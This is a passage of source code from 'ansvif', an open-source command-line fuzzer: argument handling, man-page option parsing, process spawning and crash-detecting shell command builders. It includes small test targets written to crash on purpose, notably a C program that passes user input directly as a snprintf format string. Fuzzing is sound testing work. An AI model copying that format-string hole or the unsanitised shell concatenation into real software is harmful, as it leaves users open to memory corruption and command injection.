366 | help_me(argv[0]); 367 | } 368 | if ((options.junk_file_of_args != "") && (options.opt_other.size() != 0)) { 369 | /* this will fix the -F no -x bug */ 370 | help_me(argv[0]); 371 | } 372 | /* make sure the buffer size is really an integar and if it 373 | * happens to not be, then we'll send them to the help page, 374 | * otherwise we'll turn it into type int 375 | */ 376 | if ((buffercontrol.buf_size_int == 0) && (buf_size != "")) { 377 | help_me(argv[0]); 378 | } 379 | if ((buffercontrol.buf_size_int == -1) && (buf_size != "")) { 380 | buffercontrol.buf_size_int = toint(buf_size, argv[0]); 381 | } 382 | if (buffercontrol.buf_size_int == -1) { 383 | help_me(argv[0]); 384 | } 385 | if (buffercontrol.buf_size_int < 0) { 386 | std::cerr << "Buffer must be a positive integer." << std::endl; 387 | help_me(argv[0]); 388 | } 389 | /* make sure the thread count is an integar the same way 390 | * we did with the buffer size 391 | * a 392 | */ 393 | int thread_count_int = thread_count_def; 394 | if(num_threads != "") { 395 | thread_count_int = toint(num_threads, argv[0]); 396 | } 397 | /* int thread_timeout_int = thread_timeout_def; */ 398 | /* thread_timeout_int = toint(options.t_timeout, argv[0]); */ 399 | /* if we're not doing a single try then turn on 400 | * threading 401 | */ 402 | if (dontpassgo.single_try == false) { 403 | /* initialize threading! */ 404 | std::vector<std::thread> threads; 405 | for (int cur_thread = 1; cur_thread <= thread_count_int; ++cur_thread) 406 | threads.push_back(std::thread(match_seg, options, runcoms, dontpassgo, buffercontrol, debugo)); 407 | /* thrift shop */ 408 | for (auto &all_thread : threads) 409 | all_thread.join(); 410 | /* is that your grandma's coat??? */ 411 | } 412 | if (dontpassgo.single_try == true) { 413 | /* no threads or anything since we're only doing a 414 | * single run 415 | */ 416 | match_seg(options, runcoms, dontpassgo, buffercontrol, debugo); 417 | } 418 | /* exit cleanly! */ 419 | exit(0); 420 | } 421 | -------------------------------------------------------------------------------- /src/man_read.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * ansvif 3 | * A Not So Very Intelligent Fuzzer 4 | * Marshall Whittaker / oxagast 5 | */ 6 | 7 | // __ _ _ __ ___ __ ____ ____ 8 | // / ( \/ )/ _\ / __)/ _\/ ___(_ _) 9 | // ( O ) (/ ( (_ / \___ \ )( 10 | // \__(_/\_\_/\_/\___\_/\_(____/(__) 11 | #ifdef __linux 12 | #include "../include/gzstream/gzstream.h" 13 | #endif 14 | #include <cstring> 15 | #include <iostream> 16 | #include <regex> 17 | #include <stdio.h> 18 | #include <thread> 19 | #include <unistd.h> 20 | #include <vector> 21 | 22 | std::string remove_chars(const std::string &source, const std::string &chars); 23 | bool file_exists(const std::string &filen); 24 | 25 | std::vector<std::string> get_flags_man(std::string man_page, 26 | std::string man_loc, bool verbose, 27 | bool debug, bool dump_opts) { 28 | 29 | #ifdef _WIN32 30 | /* just error out :( */ 31 | std::cout << "Not implemented in Windows, sorry..." << std::endl; 32 | exit(1); 33 | #endif 34 | #ifdef __ANDROID__ 35 | /* just error out :( */ 36 | std::cout << "Not implemented in Windows, sorry..." << std::endl; 37 | exit(1); 38 | #endif 39 | /* 40 | #else 41 | std::cout << "Not implemented on Unknown operating system, sorry..." 42 | << std::endl; 43 | exit(1); 44 | #endif 45 | */ 46 | #ifdef __unix__ 47 | /* declare our variables */ 48 | std::string filename; 49 | std::vector<std::string> opt_vec; 50 | /* put the filename back together */ 51 | filename = 52 | "/usr/share/man/man" + man_loc + "/" + man_page + "." + man_loc + ".gz"; 53 | if (file_exists(filename) == true) { 54 | /* change our type for chr_fn */ 55 | char *chr_fn = strdup(filename.c_str()); 56 | /* time for the gunzip! */ 57 | igzstream in(chr_fn); 58 | std::string gzline; 59 | /* now we have some hella fucking regexes that are 60 | * going to be matched... fml 61 | */ 62 | std::regex start_of_opt_1("^(\\.?\\\\?\\w{2} )*(\\\\?\\w{2} ?)*(:?\\.B " 63 | ")*((?:(?:\\\\-)+\\w+)(?:\\\\-\\w+)*).*"); 64 | std::smatch opt_part_1; 65 | std::regex start_of_opt_2("^\\.Op Fl (\\w+) Ar.*"); 66 | std::smatch opt_part_2; 67 | std::regex start_of_opt_3("^\\\\fB(-\\w+)( \\\\fI.*)*.*\\\\fB.*"); 68 | std::smatch opt_part_3; 69 | std::regex start_of_opt_4("^\\\\fB(-\\w+)\\\\fR"); 70 | std::smatch opt_part_4; 71 | while (std::getline(in, gzline)) { 72 | /* if we've got a manpage, then we match the stuff 73 | * out of the regex as we're ungzing and putting the 74 | * options in strings, removing the backspaces, and 75 | * putting it all cleanly into a vector 76 | */ 77 | if (std::regex_match(gzline, opt_part_1, start_of_opt_1)) { 78 | std::string opt_1 = opt_part_1[4]; 79 | std::string opt_release = (remove_chars(opt_part_1[4], "\\")); 80 | opt_vec.push_back(opt_release); 81 | } 82 | if (std::regex_match(gzline, opt_part_2, start_of_opt_2)) { 83 | std::string opt_2 = opt_part_2[1]; 84 | opt_vec.push_back("-" + opt_2); 85 | } 86 | if (std::regex_match(gzline, opt_part_3, start_of_opt_3)) { 87 | std::string opt_3 = opt_part_3[1]; 88 | opt_vec.push_back(opt_3); 89 | } 90 | if (std::regex_match(gzline, opt_part_4, start_of_opt_4)) { 91 | std::string opt_4 = opt_part_4[1]; 92 | opt_vec.push_back(opt_4); 93 | } 94 | 95 | } 96 | } else { 97 | /* either they didn't have the right location or the command 98 | * doesn't have a manpage, either way, exit with error 1 99 | */ 100 | std::cerr << "Could not find a manpage for that command..." << std::endl; 101 | exit(1); 102 | } 103 | /* sort them so that we can unique them correctly */ 104 | std::sort(opt_vec.begin(), opt_vec.end()); 105 | opt_vec.erase(unique(opt_vec.begin(), opt_vec.end()), opt_vec.end()); 106 | /* just so we don't get an unsigned int error */ 107 | int opt_vec_size = opt_vec.size(); 108 | if (verbose == true) { 109 | /* if we're being verbose then options used are listed */ 110 | std::cout << "Options being used: " << std::endl; 111 | for (int man_ln = 0; man_ln < opt_vec_size; man_ln++) { 112 | std::cout << opt_vec.at(man_ln) << " "; 113 | } 114 | std::cout << std::endl; 115 | } 116 | if (dump_opts == true) { 117 | /* if we're going to dump the options of the manpage with -D 118 | * then just dump them out on STDOUT and be done with it! 119 | */ 120 | for (int man_ln = 0; man_ln < opt_vec_size; man_ln++) { 121 | std::cout << " " << opt_vec.at(man_ln) << " " << std::endl; 122 | } 123 | std::cout << std::endl; 124 | exit(0); 125 | } 126 | /* return the options we've extracted out of the manpages */ 127 | return (opt_vec); 128 | #endif 129 | #ifdef _WIN32 130 | /* just error out :( */ 131 | std::cout << "Not implemented in Windows, sorry..." << std::endl; 132 | exit(1); 133 | #else 134 | std::cout << "Not implemented on Unknown operating system, sorry..." 135 | << std::endl; 136 | exit(1); 137 | #endif 138 | } 139 | -------------------------------------------------------------------------------- /src/null_pointer.c: -------------------------------------------------------------------------------- 1 | /* 2 | * ansvif 3 | * A Not So Very Intelligent Fuzzer 4 | * Marshall Whittaker / oxagast 5 | * 6 | * 7 | * __ _ _ __ ___ __ ____ ____ 8 | * / ( \/ )/ _\ / __)/ _\/ ___(_ _) 9 | * ( O ) (/ ( (_ / \___ \ )( 10 | * \__(_/\_\_/\_/\___\_/\_(____/(__) 11 | */ 12 | 13 | int main() { 14 | /* this is bad, i'm calling on a null pointer */ 15 | char *assigned_null = 0; 16 | int null_pointer = *assigned_null; 17 | } 18 | -------------------------------------------------------------------------------- /src/oxagast.cpp: -------------------------------------------------------------------------------- 1 | #include <iostream> 2 | static const char o[] = 3 | "\x0A\x20\x20\x20\x5F\x5F\x20\x5F\x20\x20\x5F\x20\x20\x5F\x5F"\ 4 | "\x20\x20\x20\x5F\x5F\x5F\x20\x20\x5F\x5F\x20\x20\x5F\x5F\x5F"\ 5 | "\x5F\x20\x5F\x5F\x5F\x5F\x20\x0A\x20\x20\x2F\x20\x20\x28\x20"\ 6 | "\x5C\x2F\x20\x29\x2F\x20\x5F\x5C\x20\x2F\x20\x5F\x5F\x29\x2F"\ 7 | "\x20\x5F\x5C\x2F\x20\x5F\x5F\x5F\x28\x5F\x20\x20\x5F\x29\x20"\ 8 | "\x0A\x20\x28\x20\x20\x4F\x20\x29\x20\x20\x28\x2F\x20\x20\x20"\ 9 | "\x20\x28\x20\x28\x5F\x20\x2F\x20\x20\x20\x20\x5C\x5F\x5F\x5F"\ 10 | "\x20\x5C\x20\x29\x28\x20\x0A\x20\x20\x5C\x5F\x5F\x28\x5F\x2F"\ 11 | "\x5C\x5F\x5C\x5F\x2F\x5C\x5F\x2F\x5C\x5F\x5F\x5F\x5C\x5F\x2F"\ 12 | "\x5C\x5F\x28\x5F\x5F\x5F\x5F\x2F\x28\x5F\x5F\x29\x20\x0A\x0A"; 13 | void oxagast() { 14 | std::cout << o; 15 | exit(0); 16 | } 17 | -------------------------------------------------------------------------------- /src/popen2.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * ansvif 3 | * A Not So Very Intelligent Fuzzer 4 | * Marshall Whittaker / oxagast 5 | */ 6 | 7 | // __ _ _ __ ___ __ ____ ____ 8 | // / ( \/ )/ _\ / __)/ _\/ ___(_ _) 9 | // ( O ) (/ ( (_ / \___ \ )( 10 | // \__(_/\_\_/\_/\___\_/\_(____/(__) 11 | 12 | #include <iomanip> 13 | #include <string> 14 | #include <sys/stat.h> 15 | #ifdef __unix__ 16 | #include <sys/wait.h> 17 | #endif 18 | #include <thread> 19 | #include <unistd.h> 20 | #ifdef __FREEBSD 21 | #include <cstdio> 22 | #include <errno.h> 23 | #include <stdlib.h> 24 | #endif 25 | 26 | #define READ 0 27 | #define WRITE 1 28 | 29 | FILE *popen2(std::string command, std::string type, int &pid, 30 | std::string low_lvl_user) { 31 | #ifdef __unix__ 32 | /* here the child begins */ 33 | pid_t child_pid; 34 | int fd[2]; 35 | pid = pipe(fd); 36 | if ((child_pid = fork()) == -1) { 37 | perror("fork"); 38 | exit(1); 39 | } 40 | /* here the child begins */ 41 | if (child_pid == 0) { 42 | if (type == "r") { 43 | /* redirect stdout and stdin to pipe */ 44 | close(fd[READ]); /* donno why this stuff was once taken */ 45 | dup2(fd[WRITE], 1); /* out but it doesn't work right without it */ 46 | } else { 47 | close(fd[WRITE]); 48 | dup2(fd[READ], 0); 49 | } 50 | #ifdef __NOTANDROID__ 51 | if (getuid() == 0) { 52 | /* if we're root we're going to drop our privs 53 | * this fixes not being able to reap processes that 54 | * are suid 55 | */ 56 | // command = "DISPLAY=localhost:1 " + command; 57 | execl("/bin/su", "su", "-c", "/bin/sh", "-c", command.c_str(), 58 | low_lvl_user.c_str(), NULL); 59 | } else { 60 | /* or just run it like we normally would */ 61 | execl("/bin/sh", "sh", "-c", command.c_str(), NULL); 62 | } 63 | #endif 64 | #ifdef __ANDROID__ 65 | //command = "'" + command + "'"; 66 | execl("/system/bin/sh", "sh", "-c", command.c_str(), NULL); 67 | #endif 68 | 69 | } else { 70 | if (type == "r") { 71 | close(fd[WRITE]); 72 | } else { 73 | close(fd[READ]); 74 | } 75 | } 76 | /* our new process should now equal the child's pid */ 77 | pid = child_pid; 78 | if (type == "r") { 79 | /* return the junk to the rest of the program */ 80 | return fdopen(fd[READ], "r"); 81 | } 82 | return fdopen(fd[WRITE], "w"); 83 | #endif 84 | #ifdef _WIN32 85 | //command = 86 | // command; 87 | /* char ps_buffer[128]; */ 88 | FILE *process_pipe; 89 | /* Run DIR so that it writes its output to a pipe. Open this 90 | * pipe with read text attribute so that we can read it 91 | * like a text file. 92 | */ 93 | if ((process_pipe = _popen(command.c_str(), "rt")) == NULL) 94 | return (process_pipe); 95 | /* std::cout << command << std::endl; */ 96 | return (process_pipe); 97 | #endif 98 | } 99 | 100 | 101 | 102 | /* we have to close it all our so we don't fuck 103 | * ourselves on OOM later 104 | */ 105 | int pclose2(FILE *fp, pid_t pid) { 106 | #ifdef __unix__ 107 | int stat; 108 | fclose(fp); 109 | while (waitpid(pid, &stat, 0) == 0) { 110 | if (errno != EINTR) { 111 | stat = -1; 112 | break; 113 | } 114 | } 115 | /* return our status and end pclose2 */ 116 | return stat; 117 | #endif 118 | #ifdef _WIN32 119 | /* we have to close it all our so we don't fuck 120 | * ourselves on OOM later 121 | */ 122 | /* return our status and end pclose2 */ 123 | if (feof(fp)) { 124 | _pclose(fp); 125 | } 126 | return -1; 127 | #endif 128 | } 129 | 130 | -------------------------------------------------------------------------------- /src/randomizer.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * ansvif 3 | * A Not So Very Intelligent Fuzzer 4 | * Marshall Whittaker / oxagast 5 | */ 6 | 7 | // __ _ _ __ ___ __ ____ ____ 8 | // / ( \/ )/ _\ / __)/ _\/ ___(_ _) 9 | // ( O ) (/ ( (_ / \___ \ )( 10 | // \__(_/\_\_/\_/\___\_/\_(____/(__) 11 | 12 | #include <functional> 13 | #include <random> 14 | 15 | int rand_me_plz(int rand_from, int rand_to) { 16 | #ifdef _WIN32 17 | int first = rand_to - (rand_from - 1); 18 | int rolled = rand() % first - rand_from; 19 | #endif 20 | #ifdef __unix__ 21 | std::random_device rd; 22 | std::default_random_engine generator(rd()); // seed random 23 | std::uniform_int_distribution<int> distribution(rand_from, 24 | rand_to); // get a random 25 | auto roll = std::bind(distribution, 26 | generator); // bind it so we can do it multiple times 27 | int rolled = roll(); 28 | #endif 29 | return (rolled); 30 | } 31 | -------------------------------------------------------------------------------- /src/reaper.cpp: -------------------------------------------------------------------------------- 1 | #include <string> 2 | #include <signal.h> 3 | #include <cstdlib> 4 | #include <unistd.h> 5 | 6 | int reaper(int grim, int t_timeout, std::string just_kill_me) { 7 | #ifdef __unix__ 8 | /* run the timer and after the timeout we'll run 9 | * SIGKILL on it (kill -9 equivilant on linux) 10 | */ 11 | //std::cout << " pid: " << grim << " timeout " << t_timeout << std::endl; 12 | sleep(t_timeout); 13 | kill(grim, 15); 14 | int ret = 0; 15 | /* if the above doesn't work, we can fall back to piggybacking pkill 16 | * if they use -N 17 | */ 18 | if ( just_kill_me != "") { 19 | just_kill_me = "pkill " + just_kill_me; 20 | ret = system(just_kill_me.c_str()); 21 | } 22 | return (ret); 23 | #elif _WIN32 24 | /* windows doesn't support kill 9 */ 25 | return(1); 26 | #else 27 | return (0); 28 | #endif 29 | } 30 | 31 | -------------------------------------------------------------------------------- /src/remove_chars.cpp: -------------------------------------------------------------------------------- 1 | #include <cstdlib> 2 | #include <string> 3 | #include <unistd.h> 4 | 5 | std::string remove_chars(const std::string &source, const std::string &chars) { 6 | // initialize an empty removal string // 7 | std::string result = ""; 8 | for (unsigned int i = 0; i < source.length(); i++) { 9 | // loop through each character removing the ones we 10 | // don't want 11 | // 12 | bool foundany = false; 13 | for (unsigned int j = 0; j < chars.length() && !foundany; j++) { 14 | foundany = (source[i] == chars[j]); 15 | } 16 | if (!foundany) { 17 | // put it back in the buffer if it's not in the list 18 | result += source[i]; 19 | } 20 | } 21 | return (result); 22 | } 23 | 24 | int count_quotes(std::string s) { 25 | unsigned int count = 0; 26 | for (unsigned int i = 0; i < s.size(); i++) 27 | if (s[i] == '\'') count++; 28 | return count; 29 | } 30 | -------------------------------------------------------------------------------- /src/string_format.c: -------------------------------------------------------------------------------- 1 | /* 2 | * ansvif 3 | * A Not So Very Intelligent Fuzzer 4 | * Marshall Whittaker / oxagast 5 | * 6 | * 7 | * __ _ _ __ ___ __ ____ ____ 8 | * / ( \/ )/ _\ / __)/ _\/ ___(_ _) 9 | * ( O ) (/ ( (_ / \___ \ )( 10 | * \__(_/\_\_/\_/\___\_/\_(____/(__) 11 | */ 12 | 13 | #include <stdio.h> 14 | #include <stdlib.h> 15 | #include <string.h> 16 | 17 | int main(int argc, char **argv) { 18 | char buffer[64]; 19 | int x = 1; 20 | snprintf(buffer, sizeof(buffer), argv[1]); 21 | buffer[sizeof(buffer) - 1] = 0; 22 | int howmuch = strlen(buffer); 23 | printf("Buffer:(%d) \nData:%s\n", howmuch, buffer); 24 | return 0; 25 | } 26 | -------------------------------------------------------------------------------- /src/sys_string.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * ansvif 3 | * A Not So Very Intelligent Fuzzer 4 | * Marshall Whittaker / oxagast 5 | */ 6 | 7 | // __ _ _ __ ___ __ ____ ____ 8 | // / ( \/ )/ _\ / __)/ _\/ ___(_ _) 9 | // ( O ) (/ ( (_ / \___ \ )( 10 | // \__(_/\_\_/\_/\___\_/\_(____/(__) 11 | 12 | #include <cstdlib> 13 | #include <string> 14 | #include <unistd.h> 15 | #include <vector> 16 | 17 | std::string binstr_to_hex(std::string bin_str); 18 | std::string binstr_to_hex_pc(std::string bin_str_pc); 19 | std::string get_out_str(std::string env_str, std::string valgrind_str, std::string sys_str, 20 | std::string path_str, std::string always_arg_b, 21 | std::string always_arg, std::string fuzz_after, 22 | std::string log_prefix, std::string before_command, bool pipe_write, bool verbose) { 23 | /* these are the strings that will go to be run in popen 24 | * out_str is normal, and out_str_p is pritnf compatible 25 | * for easy crash replay, except this is for % for 26 | * web browsers and such 27 | */ 28 | // fuzz_after = ""; 29 | std::string out_str, out_str_p; 30 | /* no shooting blanks plz */ 31 | #ifdef __NOTANDROID__ 32 | if (sys_str != "") { 33 | if (env_str != "") { 34 | out_str_p = "$(printf \"" + binstr_to_hex(env_str) + "\") " + 35 | valgrind_str + " " + path_str + " " + always_arg_b + 36 | " $(printf \"" + binstr_to_hex(sys_str) + "\") " + 37 | always_arg + fuzz_after; 38 | } 39 | if (env_str == "") { // if we have no environment string 40 | out_str_p = valgrind_str + " " + path_str + " " + always_arg_b + 41 | " $(printf \"" + binstr_to_hex(sys_str) + "\") " + 42 | always_arg + " $(printf \"" + binstr_to_hex(fuzz_after) + 43 | "\") "; 44 | } 45 | if (pipe_write == true) { 46 | out_str = env_str + " " + valgrind_str + " (echo " + fuzz_after + " && cat) | " + path_str + " " + always_arg_b + sys_str + " " + always_arg + fuzz_after; 47 | } 48 | else { 49 | out_str = env_str + " " + valgrind_str + " " + before_command + " " + path_str + " " + always_arg_b + sys_str + " " + always_arg + fuzz_after; 50 | } 51 | } 52 | if (log_prefix == "") { 53 | /* not logging here */ 54 | if (verbose == true) { 55 | out_str = out_str + "; CC=$?; if [ $CC -eq 132 -o $CC -eq 136 -o $CC -eq 139 -o $CC -eq 135 -o $CC -eq 134 -o $CC -eq 159 ]; then echo CRASHCODE $CC; touch /tmp/ansvif.crashed; fi"; 56 | } 57 | if (verbose == false) { 58 | out_str = out_str + " >/dev/null 2>&1; CC=$?; if [ $CC -eq 132 -o $CC -eq 136 -o $CC -eq 139 -o $CC -eq 135 -o $CC -eq 134 -o $CC -eq 159 ]; then echo CRASHCODE $CC; touch /tmp/ansvif.crashed; fi"; 59 | } 60 | } else { 61 | /* logging here */ 62 | out_str = out_str + " >" + log_prefix + 63 | ".output.ansvif.log 2>&1; CC=$?; if [ $CC -eq 132 -o $CC -eq 136 -o $CC -eq 139 -o $CC -eq 135 -o $CC -eq 134 -o $CC -eq 159 ]; then echo CRASHCODE $CC; touch /tmp/ansvif.crashed; fi"; 64 | } 65 | #endif 66 | #ifdef __ANDROID__ 67 | if (sys_str != "") { 68 | if (env_str != "") { 69 | out_str_p = "$(printf \"" + binstr_to_hex(env_str) + "\") " + 70 | valgrind_str + " " + path_str + " " + always_arg_b + 71 | " $(printf \"" + binstr_to_hex(sys_str) + "\") " + 72 | always_arg + fuzz_after; 73 | } 74 | if (env_str == "") { // if we have no environment string 75 | out_str_p = valgrind_str + " " + path_str + " " + always_arg_b + 76 | " $(printf \"" + binstr_to_hex(sys_str) + "\") " + 77 | always_arg + " $(printf \"" + binstr_to_hex(fuzz_after) + 78 | "\") "; 79 | } 80 | out_str = env_str + " " + valgrind_str + " " + before_command + " " + path_str + " " + 81 | always_arg_b + sys_str + " " + always_arg + fuzz_after; 82 | } 83 | if (log_prefix == "") { 84 | /* not logging here */ 85 | out_str = out_str + " >/dev/null 2>&1; CC=$?; if [ $CC -eq 132 -o $CC -eq 136 -o $CC -eq 139 -o $CC -eq 135 -o $CC -eq 134 -o $CC -eq 159 ]; then echo CRASHCODE $CC; touch /sdcard/ansvif/ansvif.crashed; fi"; 86 | } else { 87 | /* logging here */ 88 | out_str = out_str + " >" + log_prefix + 89 | ".output.ansvif.log 2>&1; CC=$?; if [ $CC -eq 132 -o $CC -eq 136 -o $CC -eq 139 -o $CC -eq 135 -o $CC -eq 134 -o $CC -eq 159 ]; then echo CRASHCODE $CC; touch /sdcard/ansvif/ansvif.crashed; fi"; 90 | } 91 | #endif 92 | #ifdef _WIN32 93 | if (env_str != "") { 94 | out_str_p = " (.\\printf.exe \\x" + binstr_to_hex(env_str) + "\") " + 95 | "'" + path_str + "' (.\\printf.exe \\x" + 96 | binstr_to_hex(sys_str) + ")" + always_arg + " " + fuzz_after + 97 | " > " + log_prefix + ".output.ansvif.log}); echo $LastExitCode"; 98 | } 99 | if (env_str == "") { 100 | out_str_p = "'" + path_str + "' (.\\printf.exe \\x" + 101 | binstr_to_hex(sys_str) + ") " + always_arg + " " + 102 | fuzz_after + " > " + log_prefix + ".output.ansvif.log}); echo $LastExitCode"; 103 | } 104 | out_str = "cmd /c powershell -c " + env_str + "Start-Process -FilePath '" + path_str + "'" + 105 | " -ArgumentList " + always_arg_b + " " + sys_str + " " + always_arg + " " + 106 | fuzz_after + " > " + log_prefix + ".output.ansvif.log -PassThru; echo $LastExitCode"; 107 | #endif 108 | /* here we declare out_all and put the out_str and out_str_p 109 | * printf compatible stuff into the vector to be fed back into 110 | * the calling routine 111 | */ 112 | return (out_str); 113 | } 114 | 115 | std::string 116 | get_out_str_pc(std::string env_str, std::string valgrind_str, 117 | std::string sys_str, std::string path_str, 118 | std::string always_arg_b, std::string always_arg, 119 | std::string fuzz_after, std::string log_prefix, std::string before_command, bool write_pipe, bool verbose) { 120 | /* these are the strings that will go to be run in popen 121 | * out_str is normal, and out_str_p is pritnf compatible 122 | * for easy crash replay, except this is for % for 123 | * web browsers and such 124 | */ 125 | std::string out_str, out_str_p; 126 | /* make sure we're not shooting blanks */ 127 | #ifdef __NOTANDROID__ 128 | if (sys_str != "") { 129 | if (env_str != "") { 130 | /* this is if we have an environment string */ 131 | out_str_p = "$(printf \"" + binstr_to_hex(env_str) + "\") " + 132 | valgrind_str + " " + path_str + " $(printf \"" + 133 | binstr_to_hex(binstr_to_hex_pc(sys_str)) + "\") " + 134 | always_arg + binstr_to_hex(binstr_to_hex_pc(fuzz_after)); 135 | } 136 | if (env_str == "") { 137 | /* and if we don't have environment variables to fuzz */ 138 | out_str_p = valgrind_str + " " + path_str + " " + always_arg_b + 139 | " $(printf \"" + binstr_to_hex(binstr_to_hex_pc(sys_str)) + 140 | "\") " + always_arg + " $(printf \"" + 141 | binstr_to_hex(binstr_to_hex_pc(fuzz_after)) + "\") "; 142 | } 143 | out_str = env_str + " " + valgrind_str + " " + before_command + " " + path_str + " " + 144 | always_arg_b + binstr_to_hex_pc(sys_str) + " " + always_arg + 145 | binstr_to_hex_pc(fuzz_after); 146 | } 147 | if (log_prefix == "") { 148 | /* incase we are logging don't leave a blank file */ 149 | out_str = out_str + " >/dev/null 2>&1; CC=$?; if [ $CC -eq 132 -o $CC -eq 136 -o $CC -eq 139 -o $CC -eq 135 -o $CC -eq 134 -o $CC -eq 159 ]; then echo CRASHCODE $CC; touch /tmp/ansvif.crashed; fi"; 150 | } else { 151 | /* get the signal here and log */ 152 | out_str = out_str + " >" + log_prefix + ".output.ansvif.log 2>&1; CC=$?; if [ $CC -eq 132 -o $CC -eq 136 -o $CC -eq 139 -o $CC -eq 135 -o $CC -eq 134 -o $CC -eq 159 ]; then echo CRASHCODE $CC; touch /tmp/ansvif.crashed; fi"; 153 | } 154 | /* we're putting the normal version and the printf 155 | * version in this vector, normal first, printf second, 156 | * then feeding it back to the calling routing 157 | */ 158 | #endif 159 | #ifdef __ANDROID__ 160 | if (sys_str != "") { 161 | if (env_str != "") { 162 | /* this is if we have an environment string */ 163 | out_str_p = "$(printf \"" + binstr_to_hex(env_str) + "\") " + 164 | valgrind_str + " " + path_str + " $(printf \"" + 165 | binstr_to_hex(binstr_to_hex_pc(sys_str)) + "\") " + 166 | always_arg + binstr_to_hex(binstr_to_hex_pc(fuzz_after)); 167 | } 168 | if (env_str == "") { 169 | /* and if we don't have environment variables to fuzz */ 170 | out_str_p = valgrind_str + " " + path_str + " " + always_arg_b + 171 | " $(printf \"" + binstr_to_hex(binstr_to_hex_pc(sys_str)) + 172 | "\") " + always_arg + " $(printf \"" + 173 | binstr_to_hex(binstr_to_hex_pc(fuzz_after)) + "\") "; 174 | } 175 | out_str = env_str + " " + valgrind_str + " " + before_command + " " + path_str + " " + 176 | always_arg_b + binstr_to_hex_pc(sys_str) + " " + always_arg + 177 | binstr_to_hex_pc(fuzz_after); 178 | } 179 | if (log_prefix == "") { 180 | /* incase we are logging don't leave a blank file */ 181 | out_str = out_str + " >/dev/null 2>&1; CC=$?; if [ $CC -eq 132 -o $CC -eq 136 -o $CC -eq 139 -o $CC -eq 135 -o $CC -eq 134 -o $CC -eq 159 ]; then echo CRASHCODE $CC; touch /sdcard/ansvif/ansvif.crashed; fi"; 182 | } else { 183 | /* get the signal here and log */ 184 | out_str = out_str + " >" + log_prefix + ".output.ansvif.log 2>&1; CC=$?; if [ $CC -eq 132 -o $CC -eq 136 -o $CC -eq 139 -o $CC -eq 135 -o $CC -eq 134 -o $CC -eq 159 ]; then echo CRASHCODE $CC; touch /sdcard/ansvif/ansvif.crashed; fi"; 185 | } 186 | /* we're putting the normal version and the printf 187 | * version in this vector, normal first, printf second, 188 | * then feeding it back to the calling routing 189 | */ 190 | #endif 191 | #ifdef _WIN32 192 | // if (sys_str != "") { 193 | if (env_str != "") { 194 | out_str_p = " (.\\printf.exe \\x" + binstr_to_hex(env_str) + "\") " + 195 | "'" + path_str + "' (.\\printf.exe \\x" + 196 | binstr_to_hex(sys_str) + ")" + always_arg + " " + fuzz_after + 197 | " > " + log_prefix + ".output.ansvif.log; echo $LastExitCode}); echo $LastExitCode"; 198 | } 199 | if (env_str == "") { 200 | out_str_p = "'" + path_str + "' (.\\printf.exe \\x" + 201 | binstr_to_hex(sys_str) + ") " + always_arg + " " + 202 | fuzz_after + " > " + log_prefix + ".output.ansvif.log; echo $LastExitCode}); echo $LastExitCode"; 203 | } 204 | out_str = "powershell -c " + env_str + "(Start-Job {& '" + path_str + "' " + 205 | always_arg_b + " " + sys_str + " " + always_arg + " " + 206 | fuzz_after + " > " + log_prefix + ".output.ansvif.log}); echo $LastExitCode"; 207 | // } 208 | // out_str = 209 | // out_str + " > " + log_prefix + ".output.ansvif.log; echo $LastExitCode\\})"; 210 | #endif 211 | return (out_str_p); 212 | } 213 | -------------------------------------------------------------------------------- /src/templates.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * ansvif 3 | * A Not So Very Intelligent Fuzzer 4 | * Marshall Whittaker / oxagast 5 | */ 6 | 7 | // __ _ _ __ ___ __ ____ ____ 8 | // / ( \/ )/ _\ / __)/ _\/ ___(_ _) 9 | // ( O ) (/ ( (_ / \___ \ )( 10 | // \__(_/\_\_/\_/\___\_/\_(____/(__) 11 | 12 | #include <cstdlib> 13 | #include <fstream> 14 | #include <iostream> 15 | #include <random> 16 | #include <regex> 17 | #include <stdio.h> 18 | #include <unistd.h> 19 | #include <vector> 20 | 21 | std::vector<std::string> get_flags_man(std::string man_page, 22 | std::string man_loc, bool verbose, 23 | bool debug, bool dump_opts); 24 | int rand_me_plz(int rand_from, int rand_to); 25 | void help_me(std::string mr_me); 26 | 27 | std::vector<std::string> get_flags_template(std::string filename, bool verbose, 28 | bool debug) { 29 | /* initialize an options vector and push each option 30 | * back onto the vector from the template file 31 | */ 32 | std::vector<std::string> opt_vec; 33 | std::string line; 34 | std::ifstream template_file(filename); 35 | if (template_file.is_open()) { 36 | while (std::getline(template_file, line)) { 37 | opt_vec.push_back(line); 38 | } 39 | /* we should close it */ 40 | template_file.close(); 41 | } else { 42 | /* this is incase they supplied a file that wasn't 43 | * available for some reason 44 | */ 45 | std::cerr << "Could not open template file..." << std::endl; 46 | help_me("ansvif"); 47 | } 48 | return (opt_vec); // return the vector with the options 49 | } 50 | 51 | std::vector<std::string> get_other(std::string filename, bool verbose, 52 | bool debug) { 53 | /* this is all pretty much the same as above */ 54 | std::vector<std::string> other_vec; 55 | std::string line; 56 | std::ifstream other_file(filename); 57 | if (other_file.is_open()) { 58 | while (std::getline(other_file, line)) { 59 | other_vec.push_back(line); 60 | } 61 | other_file.close(); 62 | } else { 63 | std::cerr << "Could not open template file..." << std::endl; 64 | help_me("ansvif"); 65 | } 66 | return (other_vec); 67 | } 68 | -------------------------------------------------------------------------------- /src/to_int.cpp: -------------------------------------------------------------------------------- 1 | #include <string> 2 | #include <cstdlib> 3 | #include <fstream> 4 | #include <iostream> 5 | #ifdef __unix 6 | #include "version.h" 7 | #endif 8 | #ifdef _WIN32 9 | #include "version.h" 10 | #endif 11 | #include <sstream> 12 | 13 | void help_me(std::string mr_me); 14 | 15 | int toint(std::string ints, std::string my_prog) { 16 | std::istringstream b_size(ints); 17 | int is_int_b_s; 18 | if (!(b_size >> is_int_b_s)) { 19 | help_me(my_prog); 20 | } 21 | char buf_char_maybe_b_s; 22 | if (b_size >> buf_char_maybe_b_s) { 23 | help_me(my_prog); 24 | } else { 25 | /* for compatibility with cygwin */ 26 | return atoi(ints.c_str()); 27 | } 28 | return (0); 29 | } 30 | 31 | -------------------------------------------------------------------------------- /src/trash.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * ansvif 3 | * A Not So Very Intelligent Fuzzer 4 | * Marshall Whittaker / oxagast 5 | */ 6 | 7 | // __ _ _ __ ___ __ ____ ____ 8 | // / ( \/ )/ _\ / __)/ _\/ ___(_ _) 9 | // ( O ) (/ ( (_ / 